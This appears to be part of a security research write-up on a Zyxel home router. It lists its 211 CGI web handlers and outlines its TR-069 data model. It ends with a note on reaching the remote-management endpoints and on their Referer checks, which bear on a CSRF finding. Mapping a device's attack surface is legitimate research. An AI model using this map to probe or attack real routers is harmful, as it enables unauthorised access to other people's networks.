- doregister.cgi
- clear_first_access.asp
- indexmain.cgi
- menuJson.cgi
- naviView_partialLoad.cgi
- info.cgi
- current.cgi
- statusview.cgi
- networkMap.cgi
- broadband.cgi
- connection_icon_list.cgi
- connection_table_list.cgi
- connectionStatus_p1.cgi
- wanRemoteNode_ETH_Edit.cgi
- wanRemoteNode_GPON_Edit.cgi
- lanSetup.cgi
- ipv6LanSetup.cgi
- dhcp_static_list.cgi
- staticDHCP_add.cgi
- staticDHCP.cgi
- ipalias.cgi
- wlan_general.cgi
- wlan_MACAuthentication.cgi
- wlan_macfilter_add.cgi
- wlan_macfilter_edit.cgi
- wlan_mac_address_list.cgi (+ 1,2,3 variants)
- wlan_moreAP.cgi
- wlan_moreap_edit.cgi
- wlan_others.cgi
- wlan_wps.cgi
- wlan_wpsinfo.cgi
- wlan_WpsStatus.cgi
- wlan_WPStimerRunning.cgi
- wlan_staionInfo.cgi
- wlan_staionInfo_list.cgi (+ 1,2,3 variants)
- moreApStatus.cgi
- wlan5_* (mirrors all 2.4GHz CGIs)
- wlan_scheduling.cgi
- wlan_schedule_add/edit/delete.cgi
- EasyMesh.cgi
- qos_general.cgi
- qos_class.cgi
- qos_queue.cgi
- qos_shaper.cgi
- qos_class_add.cgi
- queue_add.cgi
- shaper_add.cgi
- NAT_General.cgi
- NAT_AddrMapping.cgi
- nat.cgi
- portForwarding.cgi (+ add/edit/list/delete variants)
- portTriggering.cgi (+ add/edit/list variants)
- dmz.cgi
- addrMap_add.cgi
- static.cgi (+ add/list variants)
- ipv6static.cgi (+ add/list variants)
- dns_routing.cgi (+ add/list variants)
- gretunnel.cgi (+ add/list variants)
- ipTunnel.cgi
- dynamicDNS_InadynV2.cgi
- dynamicDNS_InterfaceIndex.cgi
- upnp.cgi
- current_upnp_table.cgi
- TELFirewall_*.cgi (13 variants)
- TR181Firewall.cgi (+ RuleEdit variant)
- IP_MAC_Filter.cgi
- ipMacFilterList.cgi
- URL_Filter.cgi (+ Edit/list/delete variants)
- Keyword_Filter_list.cgi
- ParentalControl.cgi
- ParentalControladd.cgi
- ParentalControl_view.cgi
- localCA.cgi (+ frame variant)
- trustedCA.cgi (+ add/view variants)
- sshCA_list.cgi
- sipServiceProvider.cgi (+ setting/list variants)
- sipAccount.cgi (+ setting/list variants)
- SIP_ALG.cgi
- phone.cgi
- callRule.cgi (+ CO variant)
- VoIPStatus.cgi (+ list variant)
- traffic_wan/lan/nat.cgi (+ frame variants)
- viewlog.cgi
- ViewSyslog.cgi
- RemMag*.cgi (General, WWW, WWW4Airtel, SNMP, DNS, ICMP, SSH, TELNET)
- backupRestore.cgi
- reboot.cgi (+ info variant)
- system.cgi
- time.cgi
- DiagGeneral.cgi
- ping.cgi
- mirror.cgi
- logSet.cgi
- zlog.cgi
- firewareUpgrade.cgi
- Fireware_UpgradesManaged.cgi
- tr69cfg.cgi
- tr369.cgi
- agentMTP.cgi (+ list variant)
- controller.cgi (+ list variant)
- stompConn.cgi (+ list variant)
- mqttClient.cgi (+ list variant)
- fileSharing.cgi (+ add/mod/del/list/browse variants)
- fileuser_*.cgi (add/mod/del/list variants)
- printServer.cgi
- userAccount.cgi
- PCP_ClientListIndex.cgi (+ view variant)
- PCP_list.cgi
- pcplist.cgi
- gponPassword.cgi
- vd.cgi
- vdview.cgi
- tabFW.cgi
- delete.cgi
- delete_RuleSum.cgi
- autofw_notify.asp (+ check variant)
- schedule_list.cgi
Total: 211 CGI binaries
InternetGatewayDevice.
├── DeviceInfo.
│ ├── ManufacturerOUI
│ ├── SerialNumber
│ └── SoftwareVersion
├── Layer3Forwarding.
│ └── Forwarding.{i}
├── LANDevice.{i}.
│ ├── WLANConfiguration.{i}.
│ │ ├── SSID
│ │ ├── BeaconType
│ │ └── ...
│ └── X_5067F0_IPv6LANHostConfigManagement.
├── WANDevice.{i}.
│ ├── WANConnectionDevice.{i}.
│ └── ...
├── X_5067F0_Ext.
│ ├── LoginPrivilegeMgmt.{i}
│ ├── Print
│ ├── FTP
│ └── ...
├── ManagementServer.
│ └── X_5067F0_CAContent
├── Mos.
│ └── MosUserConfig.
├── QoS.
├── Time.
├── IGMP.
└── ...
Note: X_5067F0_ prefix indicates vendor-specific extensions (5067F0 = Zyxel vendor code in hex)
Document Version: 2.0
Last Updated: 2025-10-06
Total Pages Documented: 38 page categories
Total CGI Handlers: 211
Vulnerabilities Identified: 10 major issues
Classification: Security Research - Confidential
Note on the remote management handlers: the RemMag*.cgi names listed above (RemMagTELNET.cgi, etc.) must be requested with a lowercase initial, e.g. remMagTELNET.cgi instead of RemMagTELNET.cgi; the capitalised form returns 404 Not Found. With the correct lowercase name the server answers with a 402 response described as "forbidden" (402 is nominally Payment Required, so this fork appears to reuse the code for rejected requests), which shows the URL itself is valid and that the remaining obstacle is the server's HTTP Referer header validation. At least these endpoints therefore do check Referer, which qualifies the blanket "No Referer validation" entry in the CSRF finding above.